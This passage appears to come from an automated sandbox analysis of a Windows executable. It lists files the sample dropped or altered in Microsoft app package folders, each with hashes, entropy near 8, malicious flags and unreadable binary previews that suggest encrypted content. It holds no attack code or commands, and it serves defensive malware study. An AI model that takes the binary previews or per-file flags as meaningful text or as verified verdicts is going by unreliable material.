                  SHA-512:C36259D8AB507BA87E9870B66FA4E3767569B13FC36F34AD2A32F60953C963BB4C40A89866B19833578CA7932B426699BDF0CA3AACA6EF77EB80F8A7DE98A79D
                  Malicious:false
                  Preview:regf...8N.E...#..y.J....zb.<O.X9.b.f*....c.(........W.q+....}.q.)...M.d<..h[.2dc....Y..B.$.W0.7T...ZQz...A..S......fx].]..BE.L..=oC....eUi..4.L...d.....Jd.2.x.*..T.2tE/..,3s.>?:F3Y.....w...D`...7.K.|..%eN..csB..........f9.i'.j!....:+\..>oC.I.Z.........~K........O._.:$....<...g...a......5x.*.....aq.;..:.:M..r.^..\oP>......0.....*.k...-~.7..m.t........R.T.8O...v........T.).gL.:D..8.Cg.......6#$m..A-...$sQ..4..b...f.)..)G.6.`........l...8?.7y...............].._>..3S.;....;...Tbrm...+....#j.R...R..!(.}.2q..Q..)|. .c,.p.gA.=....h..9{y"S.........y..d.......gh..2M....6.-A....|.....n.&.Y.U.}.......m:...{.1..rer.;,.?...v.).O..d.W..\...~...l..A3......[|$p.nT....f...N....zmS.......[.J(:c.y.....!%......_...#....._...}./<..u...h.|.....5.+..z..1.yf.....d..k lTG..d1A..%.b9..:...........v..vTF.r..V{..H.w^...9.....4v..'#&ql.4q..y+..,.Q.=j...o1p.*Z:.VV.S....jJ.....%...dT../0....7'a..y` ....JR/M.T.H..A.?..c.eG.\..:....8...HjZ.1<V.S_.l?....O..C(K._

                  C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979865876586799
                  Encrypted:false
                  SSDEEP:192:iJSvlCUksLr/8AMkTrgqgf+D5O6KKQAe4Rku12IZmDWvzZ6Q4Xef:i0vlnkqrOkTNG+PRku1hcDWF4m
                  MD5:84915836BCB1E86CAEA3B18C14C0F256
                  SHA1:1DF7FCFE7D5769B2CDEC4216694E440BD60AC0B7
                  SHA-256:1EC3E1CEB0A086CDF6BBC4003C2156E229EFEB010C4583B1E1CF2517A234E30B
                  SHA-512:14A0EF2329D8B296639A848714012E0E2FA7664EC73EEEA4EF8ABBDAB95C4502A1E7D80E0E1E26669BD41325B247A838083B7703FE2200994E113B629019E7EC
                  Malicious:false
                  Preview:regf...E..F..g...=.J..1s......37..O...4....s.xT.;:......0-...W.4..L.Z...}..q.cR<M......]G.0.y.U8{.5k....q....E}.{..n..)n7$....-...p4Z4.{6C<.=..+.w.H........se`{.....c.n.....k.....j.pe.K..1.es...-:.2.W..2...v$..........~...kno..@.2..w+..=...t.i.{.}..A..Cd....f.....l.W....b..8..w.....F.j.....&...UYX.QJ........C...m.....b.4.....y.$.pI..O0.M.V9..:.w/...w...DJ.J?e.s_...Y `.f..o.R...~.(.~Z.H.;..,..x.Dc.....s...A.......U..u..j...R.e.,YP.........$..*g......p...|.%.Z.'^+.<6...=.).!.]... .-..P....a...~..y<..4.n.........=..f.3T.*..h........,P..*.s;d.l..E.K.(...zIzE.^...w.n.P2......]I.]B..23.R.KA.s..M....O. \.R.....E.X......|I.....j.u.5....M..5...rb<U5.Z?3......t .s...........sA.p.......\^+e..........>.\.7.gB.0@.md......o......9Gw.....X.... .0....m..../cr.{MZ.w{G....'.D.Q.z.../..T...x..v.'..{.....-A....:.?,..?.q....r........J.'>.......b....{>'...q...!F*(...r..[*&p+..........].....C...e.*.'.o.w8..z.U.#.\../.eN.8c..i7.6....."......U.."

                  C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.979418037984097
                  Encrypted:false
                  SSDEEP:192:+zvo9Cs3c1qTD8X6w69sEFtSiGwMYbd8Ow0jMY0CLA:uKT3Rw0sGt2Qr9NrLA
                  MD5:91B67D98BB817FB4ECE7E5D6E52FDA75
                  SHA1:E633D36AF81D6117EA8578C1B7ACFA9F56774DF6
                  SHA-256:7CD831C5BC60E2320B880FA57223F40B50667B136A8168029DECD38559E42B6B
                  SHA-512:1F6F1C9A04AF53E3CC6A0965FB46C00432A43C28682AD48A7C7EA49812918B2EFFB831E914CCAFD1D07040DF4E18C7FA66420BA456F6EC31EA0670F95E9592C9
                  Malicious:false
                  Preview:regf.H.....-jj..>....=.........`..ui.....O.\....9..^.F..L.[...............Xb'~/>)..a....0.#.K..............[...Jw..:.H...nuK..6R..&v..`.68*..p....V....a,..{.q.....q....8q...........G.b>.`R.#...4.Yi.7n.hs.{.0..P.X.|....~....3..C<..M..Vl..b..hP$!,.CAZ...am.,........J6.nf.i.)..Z.I....?,..$.o......J......."#.........`........,...k7[.(.-.n...sU(.......;X..)..dB...D.H..G.ux..Ts.Ao..`.$h.3cR713Nl^...>v.\.1(v.9...|...e..w,y...b...T...P..(.......3w.j%...x.T.Q.....j2.A_*.t.m._.G+.B..4j.J.mL..k.m....o.4.@....R^..}.......i..7.!(....O.......d..*.R?m.$.$.A...a....t.$>v..x..z.F..@>,.d...j.u.F.#.....N..r....\.;U...]f.cz...[}..e.E..A....}&..K.....".4oY.1o.<.f.^.=..j.#<'..d~?`..E<0..F.?k..d..{..g9<...._,.Lc.X..[..x..+...Z.)....*x?-.........F...M..mW..]CIm..pd_.......u......t.Z.b. 4>....A$w.#F~....~.(FO.(..#V?.k#.?^.~>9.>..5...$..G..V.-..X.&9.1.9\/.o...n..].o=...Q....sYL.e!.Xy.R..{...\..9........)P...</.K7..+..K.Hq.z.}{\>.a{..x.........S....>.*X....g..|.M

                  C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.98143963661955
                  Encrypted:false
                  SSDEEP:192:r/IkghgUzz+925V/T04C5vaY3cf5eqhQ3hqsoZrShhq:cxe25VY4cv5c8hqsdE
                  MD5:4332F0DFE93289369FC51F575DB90F3C
                  SHA1:D3BD19612248F9BD7F594D781561186AB6FACA78
                  SHA-256:520098A9E99AE5AB8B7D29CC83FF2FD00C049D5394F093C5564000BD18F7C6B6
                  SHA-512:FD04E93D4C61C4ED0D82C507A1D13125485A5308241EAE806A1CBD8A334BD6A770C3E8218114C4688CF8A648076420ACF69C367CCBC3570D6CE450D117A0A69C
                  Malicious:false
                  Preview:regf.8..h?}.!..t9*.Y.]J...R..p....D.^WB..\Z.T"#T.x.....C.5.......M...r.6^.._$.$..C..#..b..+..q..A.l..S =.z..).[E...q.V...A0..q.....<W@.......iX...i.Y~.c...QRO.q......Y/.J..E6}K...]>........:.....y'..R.f....W.|!.Q.z:....N..?..B...R..!b.....F.0q..%..".m.z.+~v.mGc..&b.8=..l.G./.......QP.n....."..w.97.n...{.n........H..ms....2.^.L.e.~e.l.{..s.e...*(]...=.X.`60UF1\.j..%BM..s.c.....bP......{'.Fw....{..}.(y..R..Rq.....F...........3.=....6.Y..}..S....U.{.....7...Wm{M.Y'].]F.....l...Q.G.:........W5>r..cR....9.mX...yc...5.FR"...1w.+.e.H..F......D.....8U>.p...?..8.5i ..w..g.k^..B.p..W...f..7...[=...C....pp.....\.?.4.=#.q.....Vs.{........T.p.LK.].'.0.b.*Q.i7.../)7s......S.<....3.t.(...4.?\.N..s.......!J...p.u*"....!..\$q.....R|.._3.{.......0.eD...F...._7..v.Z.w.x.^.%5<!<....JZ..(..K.U.C.1.....T.1.J.$.f...k....b...S..?G.Q...{.Q@s.....{'...iX..P)...V...D..bl.....p....LN..t.R.m.....T....H&..hk.C,u.......R.L..Xd:..q.....&..K`....A.....;... .Hq..~K.f.E...

                  C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.974855039787571
                  Encrypted:false
                  SSDEEP:192:FAxURZrOxTqdBK1UCweKnuPT2n/rrRiMyCfh:F2eU1qFTQCrEwh
                  MD5:D1C8030F15431C5405166EDB23812D35
                  SHA1:681964C3059A53827C5521DC422011B384D049E6
                  SHA-256:12C5924CA4F6400AF9D1C1A184FC30138BD08082BF2114B106F82F31EB186473
                  SHA-512:5179F4A5BE0F5178BC071B0AAACD882519C09801312062C5C94F9AF38313AA0EEB0565D44108DBD27EDC2D3C11CA2BEB49E294675EB83BCC5B6764D5B10D2EF2
                  Malicious:false
                  Preview:regf.......VT".....m.D.4..b....{.yy.E..Ol..%'...M..(..b.*V.x@6`.d;T.vo-1....[.O.../..eO.X...=..r..'Kk...l.^.<....pT0$..0$E..!H..I...!..=x.S)....'..6....@.W....Z.3..0... ...&..+.K...L.I7..$W.u.....]^.Iw...|...~.@1Ln.9RVNIw...$...t.;.!oh.6.J..V.......|.I.....`...7!...l...BT>....U|.VI.i..'6...RJ.V....'.......wA.Z.C?8Q|49.db......RQ.C....'K5..K.-tO53A.^*.v....\.e*..D......"..v6...^...$.Q,5a.)6|.g.....;....16...,n&.G.<.A.'Cl.....j.....4..E..@.d..........t......3.d.z.7.4.'..........0I....,(M%.....&..#...l.d9{S...^?....{...~...A..S.c...}k.=0.......KN_.A6I.T.'?.2._..:.y38&...f.......$.q.]......R.3.jm2T. ..32@..r7.2.KU6...L}.bp.!v....<..k.......Q.y.t...v..q.....`...K...@\+:8.h\.....$.N.H..I$....#..*..c..>P..........]w....:....s*..m..F..I.$..G.?.'..1...i..}...BF._sm.VD~.w0.&..}Y.d<....^...X...~.1[..q....4.........l.L.T.Up.n.J`...:.....=...+.a)[.A)..81!...A..'.....G..B....k..Y....T=....^....U.:>r...5y$z.T....j......u:Xn.Xan(..M...zi...O1....

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975363841872065
                  Encrypted:false
                  SSDEEP:192:AgLUqZNJy4VYAS/96ELDaye+Th0AN96VJKzxNZfRnGc9:AXa7+Haye+Th0ANIf8NZVP9
                  MD5:39261F7EFFBADD9DF4A780BE39A82ABE
                  SHA1:9588C4DB81AE8C1EA3F7B07BFD1723B9C39C7B52
                  SHA-256:388F4A99494761EC1663ECF14F56A9AB7A755574E0F262823AA915F6AE5F1605
                  SHA-512:A37A5963390869FBA5906181B431C2095B5656AAA29CE8303518176ADA89BA8B4968058EAEC8936813F5A83DCF2E43D42345297A1E8A07A10AA58046DFAC3387
                  Malicious:false
                  Preview:regf....n..C.#3..)_q.c){.k(.X'..mD...b1..:R..m...M..l.U.R!.......Q7r..E>....n.;....#..I.j/.9.>.q.eQr..6cN.x5..D.B...>.?....L.v....#...z.;./.JO...A.o.&.u.F....0...[v.;..m.....6......4.vf~O4/Ob....e...>.' .)=Z..H..1 p.k.V...;h.-..nM..6.&f..I.wz,n.p..9...y......?SnI.T.S./..>.K........^.y9eMqwf#.2.".-..}.6-./.V..y.>.c8iIk.<...qC..WC..T..I%.}U.d....'.vY..vF4........o>..........z3"....6.Lqw..Vn`.h..1'.s.s}...G..v.{S.....^..}.8......... ...1l....}.M.o^..hzWu...h.".v..F.m..c....A...a.cOJ.to..c[.;#..$06....l.et.........O.c.^.j....U..}V.od..f.H0W....eus....M....U..*.\..L...Z......xvjZ..A_.w.6..pD..C.Bk8.....Yl..t....9d..o..LX..'.j.\c.....p..~ ..b.z...w.}l.I2o>F0....64.F....`C.I.Q......u....@.N..n.j4T..B.$..;W..D)"_....D<9.W..1s......- .....%._)...>f.m.uC.fg.K.....v.......A.n.V..Q..3)..'y..F...3......T<q....Q.;` {..MOY.!b.l...&a.=@z......^'.N.......O.*'..(o..k,...w:y.x.....G....;p.f9./....A...w.M#...'..R=Z0....q.*W.;.^l....rLX..dc ..A.q.h.u[

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977664547276477
                  Encrypted:false
                  SSDEEP:192:PF0NuQOgw1+6BGyNP9LewJAwlwM1dhl/8wrqFdM0b8Fe+g:PFYlZmL9LJGwlwM9lEw23M4
                  MD5:5293FB12D176E42C0CAFF0781B1A4837
                  SHA1:5072837AFBB5FDEE8E4CEDDF0C325FBCB7C5CB0B
                  SHA-256:7896A4B83FCF7D8E179BF55E451FC4B4B26C6BA6A5FE923943EBDE210FAE8000
                  SHA-512:641EC61AD3691E9BB384B5FEB23CD946DEDD1D460B3CDEF0B3B49CF1A2C70DFF3D703BBDA0B6B552A3C0984ECB4ED8CE5B4203870ADC57DBFCABA2BBD4EC6BAC
                  Malicious:false
                  Preview:regf..B......8.{..7..nk...fd....=..}^..X.S....%...f-U.\B..h.......t..+1....z.\.-.+_......&....s5#,.^Ivx#._...!.....0YMQ%{S....2..\..Bs....@.ekQ. .VM.2#y.k.h66^.)*$)......O.Cv.......H'.G..........$1*..5..$5E....X%.1.G.R-.[uu....D.`.;.....!Jcp..mN.4....M.O[...Y....(..ZZ`.p....;%.L....l6....3.rz...`....<o.z|.Dp......u......Q.~.6{..G.s..q.b.....5.fo....w,..G..y.8.I..#..B.r.8X.......`.i..]..../4t-.......2...$....~.LxU.]....WnK(...z.>..I)%."..-w.w9...k\5...K........k..4......7]g..o...=...%...m.1y.v...Y.....Bfwz..@.8..h.k......i...x...{.y.v..7.p5.F3........B.....r......w!.(..4..:I_..f.7....f.B...kP..web.&..=2.;.+.....AZ.q..4..;<....c.!....0..."$......w3U..}.AC..A.v.l........o3..X\.j.. ..T.J..G/X.#....a...h7.,n^.mE..u.W.9.G....*.h(n!CH_e_....l.......OD..aA8.........r....W)D..&..I..u.....F.\.[.|Y..K^.FE>.p.k..[..O..I.[.....K=.].A.M.u.W....lv..E.k.^."l.d.N...../ {`...]"..B`.....xN.....$....V.4......T.5..b...u.WE....q....l\..O..i.I....F.

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):107523
                  Entropy (8bit):7.998348596999605
                  Encrypted:true
                  SSDEEP:1536:NWOm/KreovvwMaCg0kyaVMTbkcOSFVQKMxRZUnS3Um/08eNsBNJ04d+dLfLfv3aO:NWDovoDn0kyaAbk6z9aaU1/0cL07jK4p
                  MD5:5C4283D92F5A2264D7B436560A1AD112
                  SHA1:E1F96169BBDB5F923642E895305C366E28B77275
                  SHA-256:C2EBE1C2453DADC8F64723EBAFFB0D1CD25FC01CA8EA9DF0BDD122E34C32671B
                  SHA-512:D365ED4AD6165A143F3AC7BEB64AA85898E08E3BE3F91FFD346E7FDC0F08C44E1B2020F8482926CED2D14DA4FD489525FE76624A7D2CE36BB720990B299E36B8
                  Malicious:true
                  Preview:<!doc.w..+..m..Y...X[*.[..n.Gp.7..m3..x..A.C..4..^.z6h.W."+....... g.`...}.z\1..i_IX..W...-Lx...V...4.W...M.e[.%..Q.p.w....v.)...H.]....3Y...&...../...\............op.~E..j].-.th......J.^Y~a..)....{...D9.lv.[.!..&=$.L\.{.--.....;.. q.xx..7..........lB.iE.9'...uu..1-/)...5..[X3.~#..>...ZbL.;.....0rS../5.j...J.0.$.y|.!(..oqErFV.m.v...)5njm..p.<{.7*.0 ...^.S..%..Q...:.t..i'.,.B..[...!..UDf..6d.~+k..70..Z......4zD.B..B..........:....Z..[2..&..W.GhF.==...%.sT..*T...Z@.e.@j....In.<w..a...|........MAm.X..7..B".....e.b.<T.1.F.../<..W..nm.....0rwz.9....*.{r.x\e.....^.....:1.....E.^..R......7...#ha.1....G....l.`...r..$^q|"/..0.-.3..~:..`.............Q.B...D..#..+...W.R...@""......Q+.1. .....t{....tZ.....]4...)1..........'y.q....F...=..o.<..#..*.~...0.i....}.'.!e...T.<9~".. ........6e............G.S....W..rl3W..0...._o.{x...;>....l6gzH...6n..E..s..D......7......^q..j......D...9U`..T..+....(6y.xb......?..m.F~R6X`....?+.!.E....19.'$.G..).....

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977035478689297
                  Encrypted:false
                  SSDEEP:192:hrkto+ADFW6Ku4FgRPpqvJPuRUS9kR4+fvy/Si+:xkW+sIgRRqxPMX9kR4MvYC
                  MD5:B9E084E6BC72B449F4C47B0B13FE5601
                  SHA1:6FEFAFBA6C33A9E9E6D33BD905762BFFF841F67C
                  SHA-256:8F046E401C45EB1DDCE26B0EAD5E5C6179743C9175845386DE9108691E0B1640
                  SHA-512:EF9C49A0AF8C84489A1E68F714B6DAAF9BE8D8146C2446D5C8F35DA943A6599AA6A1EBE021A3E8FE25995FFDCDE08BC4E35A8B4C99B401A265CB2065EDEC4900
                  Malicious:false
                  Preview:regf.........N...|...a]...up..\..^.;Q+.d..}O.,.$.y..}_.f#.....0...T. H..I.#.............Sr.(\j.n.5p.4.....po.h@^.....=..<..(3..7.......x..H.......eeO.$..IH......OX.=..;g.Z."...=...<X.9_.W..d.6J...c.)X.X.L....y{.Y.~.YH.._#.6t...$..H.p.S".\U......a....EtY....7ANh....p.Kyfcr.l..l$y.....9/.......*Cf%f..:..7..M|U.h...C[..PWrA_...U{......=...b5K...>...<.r.x.W...}9..'.."*j..KE.6..pNX...).ko.Zp..v.CY.h.q....u~....Q.d.,.'U6,..'k...s!.....E.u]J...~..k..L#...^<}..{..6ZH...|.:...0j.c3&#...vf.:}8-L..=..,.......F..4.w.'.]...`...B5...a...sA..e....0..?g...l.n..)..[.S..#...O.=.O>...2..h.8...x..x......5x`.'..[:....p*....-G.......g..Y; .u.....Qs..41.O.....m...}.(.+.u:..../.a...{/a.X...KK}Sr.8k.....FV!To+.A.. 0E..S.x......pW.1Z......p....6..._..T.U5.n....lG..W....`..|o5..%.....M.._&.@F]u~}.../..v....z.....s..m........,.cD....i.......3.A....r..:+.'..r%.9f... %p..Ju...!...2O!.`./...@...Rf....p..^...%.=..$B....../.[.>...Dn[........f.3....5x...

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.977192804509469
                  Encrypted:false
                  SSDEEP:192:/eReVzIx80qP6qfgJEznQecwJqzpO0mt230Y:OF+0M62/ztcSqzI235
                  MD5:9FFFD4A3350E20EF7F73E2FD894834C2
                  SHA1:7D7E3885DA89700D440017C923A576E7B86D1785
                  SHA-256:9F35F4C6CEE424EBB2801A1AAADB253F7C83F6EB71531DA6BC4E5FEDEE8C5DF0
                  SHA-512:089DE04095C9FE7EE76CDF5C3B2B8B6A9EB2851FB14F652EF43EADC14B3C9EE703CD6C3E352DE4AD1C90A34FE7C7761D88C90D57323C5CEB7D506A8E65DDF3C2
                  Malicious:false
                  Preview:regf....u)u...'..]8*.iZ.|D{%..m.o.#:.e..^......B.5..df..`|....$.....m..^r.z..w.~....T.,r..t$...7..N./.xr.fx.%M9...3O....#`.... .bYH.<........z.l .1.4.#.}r.j...#.....9......t.m..d...,.9.RMZ..Q....(.....>..... ..5[....w;:..Y._....a.V.m`4FG..g.C,...)5L..{.............4pRW.u...].t.f.l./\.K....].r.F..r.....[.u,.U..KK.NM...1.;..).R....T....P...<..v..&&....i5.......,.6RU.....K..&&3)q.j...6C2..\.C0.B.pKGl..g ..[u..&*W..}.g.....]&...(k..#SKs.x.R|.I.9....#.8R..+.K...D.D]..t....b.]3.3..'`..+.......k......m...V......?..y.Q.uY.H.t.k'..4N...GB7..H....jD\."_..}.1*...mU{.F..v`g.,..K.:.&..k.....'...o.U..G...M...L...v....{.J..S.V....l....Z..2...-g5..........`.....n..aU..U.:C.ae....%...4..!....wz.G.[>iXit.H..#..C..=5.....&..=.....1?..u......&.....&.....$Q.M..Q.....q.....]p.q.....*b....y....#....../.S....4.oV>e..E7F..UQ4s0m...]....7.?....2....F ...F.........>..q..k.}"...b...O.6d...N..D.$....AZ...Dh.o..@.l.0.1.`... .sg.Aq..,......j..U!.M..k.j.m..0..!.<(.C..$.a...#nC

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978462883499567
                  Encrypted:false
                  SSDEEP:192:WRRIUVyAN96JouhoHGNh2SpoSE7+um/olhF0Y1ZDGgiFGoWB3uOxMR/:WXVTN96auFDosylD0GGY5B3u+A/
                  MD5:90768D232731978D5A22F6B868E267D1
                  SHA1:5A5023FBAF83C23516A873DE4CB99926D00884E7
                  SHA-256:48EF4B0E2C3265BBBA0D8EAA80D309DE8789F120CA72BBE74062308B14760E4D
                  SHA-512:4079AEBE66F6B2C88168A0C9B455445166E01AA4A9302798B725782EC332A46975FD82B835DB306031B95A3477EC9000AB3EBCB488CEF635CC1171AE069F9625
                  Malicious:false
                  Preview:regf...&&..........O......N.k.2.6...H._..ni...<....wm.....0.K.V.^.E.?.|~,..}..Cs.4..7...I5W.....Ai.7..-.4..Y...c.".B..pMr..Il/.`V..]...........V.?WD....S..W.wB.5.]....Qx.-..b.....'Qw.Z...j..}@..^~u.SZ..... 7......@....o... ".|3....|.D...Uf.Y..]./A.`.......*..,?....t.....s..`D.w....&....~E._.4.........?R..3.)... }.={~.S..z.M....8.11..C.d...K......E<..5.K.*.OO. ^.V.;rE..E_.u..'.Q.R..}Z4...,......N.DmJp.......H..;..v.J..e......eD.....q......j>n.o6..@.5.p..u..E>[...U-U.......C;..../.b($....\....^........)_.<1m!....y.....d.A.n& ..~"..Z.J.B.u.Y....rA..tY,.w..c.S7.[!.../..(f.M.CV..Af=..X..k.....w^.#....:.....C..K..)....=M...\.1.....i...B.[.......eDx.;.nB..,.3%q.6...y;a..y..=k.........q,.DhZcA.....m.2..HH..a..G.r....7d..N.P..!...f(..I......a..6...y..8.Kh......O.a.a...q...e..,2.0.}...:ycDk.3m..e...H.q}<$.._...d.......2.B!......I.5.....U...).7...E....(..J1U.3..vT.P;....H.......V....aR...v...{...yE..|.r\.*;..e..Z..'.Ql..L...

                  C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975238864039963
                  Encrypted:false
                  SSDEEP:192:palXJOY6Ka0QZlhSmAOYl9GWlRSs8Vlz9kYvGPTbEoYqb73v3:pMp/axpSmtYl9GaRSJVlz9kY+ERM
                  MD5:A06AE2F0221683ADC7CF4B5363B98755
                  SHA1:592FD1C80666E78A65A32EAC058796251ED83366
                  SHA-256:0B698B096E1884F79EBB6ECFCC84192212DEBD72F3CABA1F2A810986EDEC7DD1
                  SHA-512:843505EC8E39DDEA77E0B6B64A0629E6F68104EFA830B5D54DBE74D38B608F05E8A12A979E7C389E46B64CA82D4C999520FB753F7205407F877A36FB2FFF4881
                  Malicious:false
                  Preview:regf.....-u.5...&p.....r...F.o...m... ...p.5).`.r....Z...w.1...3.......S..|..r..f[.2..cK.E..3j.iuI..X..0....nk.*C|....(...0...B..a.G..X..p].2~.L%.......v.y.<>ee.. .....!=:....u...,5..Dw...KNJ.........`..6NJ......-$(*y. .b}.2C.C.* %....a....k)..s.ws.....C$...<..[..$S....O...p.).U.9.}*F...~...d...)...2.}..w....U6...Kx.!.`..5nI!..g.$..k..P......b.....`._..S=.y.z.N ..Z.f]....C.}=.*.[u.=..d.....A$.....]xN.....A...:.Xx.d.g....ip~vN..[... .}BV.=q....wB.Na...+.s(:r..3=................C\.........W....|~ k...$V.K{.....;....D...|......3>..W.....1....r.L...7..4.^.^.n....o.f..j3...@..D.@L.2./qN..v...(!Y.........^....Ye%...TX../...;?W....f4.:.B.L..$j...fP...g...$...v.VbP..y.....`.....v.H.c.a.y.-...P....6d..p...Saa...^...z....Gxz...k`..)6.'.O.|&=/...~$ @......K0XK7...Q..w..Z.......~T._Me..9..j.8g:1.i....`.....~..@p.k.....y........0Y.5..$t%..cD..[..;...U".......1..D.S2..D$.^5......IL)....:m....Xb...i|...@......5u......P.....Y.y.;...|....V.yo..Js...c?.}....

                  C:\Users\user\AppData\Local\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.982128874995168
                  Encrypted:false
                  SSDEEP:192:rgmw8V44WzrIDs1xjzDJI9OAzWk/lqM50yl9JpWtFSq7E/+qXl+9+X:0IV44aMDs1xDO9D/d5Tl9JpuR/qV+9G
                  MD5:E153BCE9031879838E801A885EF505C2
                  SHA1:E90D9DD44B5B6D8EB85DA864DF73CF4BA0299C1C
                  SHA-256:5024EBEEC07CB6292B31D90E4830E5C8FD525335B25959157A84C9788C729BB7
                  SHA-512:260702F4212952225E0DA04FFD507A44282A3428AD83DA0C630E6B9B568805C901F9493E2C10AAAC1752EEE9F1CFD20A6AA70C71C9FE47960749571C141B04AF
                  Malicious:false
                  Preview:regf..%.l.....|.c..W/`...N...m.p....`.".y.^./..[H.../w.`...e..s0...b.P}..mxd.q.l..6z(.}!N93.j..[.....e....p.pU .D.7.cH..BnY..'D.U.@?.t.\..Cx.%...s*HV.%:%.Z.xv.`X.9R..U.p..r..'3ex$`y... ...9j...&...eM.#b..[.h.....?.r.^.M.'..O.8...%m.'.l.).A...<...'v..j...bB.V3j..]....8.....Ax.m.......ND.N..sI......y$2XS.B2mI.9.wG&.rv...v..A.V..u..9.".Mm.x`...?/Z.l).|\c.y..<....9..0.~...o)#..x..q...LZ..]4k......."..uC..QM$.K%+...K..(.2.{..{..~....;._...&....H.....|%.i...J9.X.x.h....M.(0.,<...m.../.............\.J\...[....B.&")...._;.7..%."..77..7)%....N...y...=.m..3:.r..+.#U..h...)^u...T}.*...9.D..`...B.\>.B....D..@.Sp~....o..5|c0....0.'..@.O.dcx.v.>..0..a.BckoE...H..;.b.+tG..\...`]+...TS.......G..-.......yH...../.3....p..uE......0.,..H!.G..I.......s...M.....Sb..'N......o;/T.}. i...d..)Ia........Z.&_..l.r].\..f{..C.qG._.L<.*!......w.5.w.&.@0.2'.Y..Wht].r75..1.......n%Iu_..I.y..3L.r.w....^n....y'.~f.:...QE.......=....%#..2D... .h%.X./...).@

                  C:\Users\user\AppData\Local\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.974475977899587
                  Encrypted:false
                  SSDEEP:192:PlHZ6h7GqJpZh6fHnNtAQvK9r95C99bfIITncZ:PV8h6wpZ+nNbvOL+xq
                  MD5:8903E9D4BADC0FA378CCBC7C4585464C
                  SHA1:606A77C54A7FC955B08085897E5CD4ED2518CEE1
                  SHA-256:BEBE38A5CBEE41212D83717C3862F1081790F8A700012F132DED85DC5D194744
                  SHA-512:A83005ED2CAB6804611C4741D1398C010B4CA46E5A149E9705D41E3035B214A35E2A63C61A6ADA38D69324A305155CF920852FD63F4F6B1EF49425035021A3B0
                  Malicious:false
